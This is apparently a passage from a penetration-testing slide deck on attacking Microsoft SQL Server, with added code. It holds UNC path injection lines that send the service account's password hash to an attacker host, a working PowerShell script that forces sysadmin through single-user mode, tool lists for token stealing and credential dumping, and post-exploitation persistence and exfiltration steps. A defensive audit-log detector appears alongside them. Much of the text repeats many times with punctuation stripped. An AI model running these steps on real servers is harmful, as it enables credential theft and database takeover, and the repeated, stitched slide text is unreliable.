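    for server, r in sorted(result.items(), key=lambda kv: kv[1].hops):
        print(f"{server:4} {r.privilege:8} hops={r.hops} via {r.via}")
```

Starting as public on DB1 (the SQL injection in the figure), the least-privilege link only yields public on DB2, but DB2's sa link gives sysadmin on DB3, the shared CORP\svc_sql account carries that to DB9, and DB9's own link reaches DB4: three sysadmin servers four hops out, with DB5 untouched because nothing links to it. Running this over a real inventory shows which links to re-map to a low-privilege remote login and which service accounts to split so that one foothold stops being "all of them".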
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands:
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008.

Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
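Because the page lists SQL Server 2000 to 2008 as having no fix, detection is what remains there: a BACKUP or RESTORE whose target is a UNC path on an unexpected host, issued by a login that is not a sysadmin, is the pattern above. The following is an added example for this page, not code from the deck or from PowerUpSQL. It assumes a constructed one-line-per-statement audit export (timestamp, server, login, a sysadmin flag, statement text); a real SQL Server Audit or Extended Events export needs its own parser, but the statement-level check is the same. The log lines, host names and the trusted backup host are constructed.

```python
import re
from typing import Dict, List

# Constructed audit lines in the one-line-per-statement format assumed for this example.
SAMPLE_AUDIT_LINES = [
    r"2016-11-08T14:02:11Z server=SQL01 login=CORP\dba_backup sysadmin=1 stmt=BACKUP DATABASE [Sales] TO DISK = N'E:\backups\sales.bak'",
    r"2016-11-08T14:05:40Z server=SQL01 login=CORP\jdoe sysadmin=0 stmt=BACKUP LOG [TESTING] TO DISK = '\\10.0.0.5\share\x'",
    r"2016-11-08T14:05:41Z server=SQL01 login=CORP\jdoe sysadmin=0 stmt=RESTORE LOG [TESTING] FROM DISK = '\\10.0.0.5\share\x'",
    r"2016-11-08T14:09:02Z server=SQL01 login=CORP\dba_backup sysadmin=1 stmt=BACKUP DATABASE [Sales] TO DISK = '\\backupsrv.corp.local\sqlbackups\sales.bak'",
    r"2016-11-08T14:10:00Z server=SQL01 login=CORP\jdoe sysadmin=0 stmt=SELECT name FROM sys.databases",
]

# Hosts expected to receive backups (constructed). Any other UNC host is where the
# service account's NetNTLM response would be sent.
TRUSTED_BACKUP_HOSTS = {"backupsrv.corp.local"}

_LINE = re.compile(
    r"^(?P<ts>\S+) server=(?P<server>\S+) login=(?P<login>\S+) sysadmin=(?P<sysadmin>[01]) stmt=(?P<stmt>.*)$"
)
# BACKUP|RESTORE DATABASE|LOG ... TO|FROM DISK = [N]'\\host\share...'
_UNC_TARGET = re.compile(
    r"\b(?P<verb>BACKUP|RESTORE)\s+(?:DATABASE|LOG)\b.*?\b(?:TO|FROM)\s+DISK\s*=\s*N?'(?P<path>\\\\[^'\\]+\\[^']*)'",
    re.IGNORECASE,
)


def detect_unc_backup_restore(lines: List[str]) -> List[Dict[str, str]]:
    """Flag BACKUP/RESTORE statements that point at a UNC path on a non-approved host."""
    findings = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue
        u = _UNC_TARGET.search(m.group("stmt"))
        if not u:
            continue   # local path, or not a BACKUP/RESTORE at all
        host = u.group("path").split("\\")[2]
        is_sysadmin = m.group("sysadmin") == "1"
        if is_sysadmin and host in TRUSTED_BACKUP_HOSTS:
            continue   # routine backup to the approved backup server
        findings.append({
            "timestamp": m.group("ts"),
            "server": m.group("server"),
            "login": m.group("login"),
            "verb": u.group("verb").upper(),
            "host": host,
            # A non-sysadmin login aiming BACKUP/RESTORE at an unexpected host is the
            # injection pattern; a sysadmin doing the same still deserves a look.
            "severity": "high" if not is_sysadmin else "review",
        })
    return findings


if __name__ == "__main__":
    for f in detect_unc_backup_restore(SAMPLE_AUDIT_LINES):
        print(f"{f['severity']:6} {f['timestamp']} {f['server']} {f['login']} {f['verb']} -> \\\\{f['host']}")
```

The local-path backup and the DBA's backup to the approved host produce nothing; the two statements from the non-sysadmin login aimed at 10.0.0.5 are reported. Restricting outbound SMB (TCP 445) from database servers to approved backup hosts limits where the hash can go on the versions the page marks as unfixable, and the audit rule above tells you when someone tried.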
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways.
2. All SQL Server versions provide the service account with sysadmin privileges.
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options (Approach: Common Tools):
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: PsExec, accessibility options debugger, with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz (lsadump), Metasploit
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from the SQL Server service process: Metasploit (Incognito), Invoke-TokenManipulation
• Single User Mode: DBATools
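The Single User Mode row of the table carried out by hand, as an added example that is neither DBATools' nor PowerUpSQL's code: run as a local Windows administrator on the SQL Server host, it restarts the instance with the -m startup option restricted to sqlcmd, adds a principal to sysadmin, and returns the instance to multi-user mode. It assumes a default instance (service MSSQLSERVER, agent SQLSERVERAGENT; a named instance uses MSSQL$NAME, SQLAgent$NAME and -S .\NAME), sqlcmd.exe on the PATH, and the placeholder principal CORP\pentester. The caveat a practitioner wants up front: this is two outages of the instance and a restart recorded in the Windows event log and the SQL Server error log, so it is the noisiest row of the table.

```powershell
# Added example (not DBATools or PowerUpSQL code): OS admin to sysadmin via single-user mode.
# Default instance assumed; CORP\pentester is a placeholder principal.
function Add-SysadminViaSingleUserMode {
    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param(
        [Parameter(Mandatory = $true)][string]$Principal,   # 'DOMAIN\user' or a SQL login name
        [string]$ServiceName  = 'MSSQLSERVER',              # named instance: MSSQL$NAME
        [string]$AgentService = 'SQLSERVERAGENT',           # named instance: SQLAgent$NAME
        [string]$Instance     = '.'                         # named instance: .\NAME
    )
    if (-not $PSCmdlet.ShouldProcess($Instance, "Restart in single-user mode and add $Principal to sysadmin")) { return }

    $loginLit = $Principal -replace "'", "''"
    $agent = Get-Service -Name $AgentService -ErrorAction SilentlyContinue
    # 1. Stop the Agent first (it would otherwise grab the single connection), then the engine.
    if ($agent -and $agent.Status -eq 'Running') { Stop-Service -Name $AgentService -Force }
    Stop-Service -Name $ServiceName -Force
    try {
        # 2. Start in single-user mode, limited to a client whose application name is SQLCMD.
        #    In this mode any member of the host's local Administrators group connects as sysadmin,
        #    whether or not BUILTIN\Administrators is still a login on the instance (the 2008+ case in the table).
        Start-Process -FilePath 'net.exe' -ArgumentList "start $ServiceName /m`"SQLCMD`"" -Wait -NoNewWindow
        # 3. Add the principal. sp_addsrvrolemember is deprecated but present from 2005 through 2016,
        #    so one statement covers every version marked in the table (ALTER SERVER ROLE needs 2012+).
        & sqlcmd.exe -S $Instance -E -Q "EXEC sp_addsrvrolemember @loginame = N'$loginLit', @rolename = N'sysadmin'"
    }
    finally {
        # 4. Back to multi-user mode, Agent included, even if step 3 failed.
        Stop-Service -Name $ServiceName -Force
        Start-Service -Name $ServiceName
        if ($agent) { Start-Service -Name $AgentService }
    }
    # 5. Verify over a normal connection: 1 means the principal is now sysadmin.
    & sqlcmd.exe -S $Instance -E -h -1 -Q "SET NOCOUNT ON; SELECT IS_SRVROLEMEMBER('sysadmin', N'$loginLit')"
}

# -WhatIf only reports what would happen; drop it (and confirm the prompt) to run the procedure for real.
Add-SysadminViaSingleUserMode -Principal 'CORP\pentester' -WhatIf
```

The finally block is the part to keep even if you simplify the rest: an instance left in single-user mode is an outage that the blue team will find before you have used the access.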
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
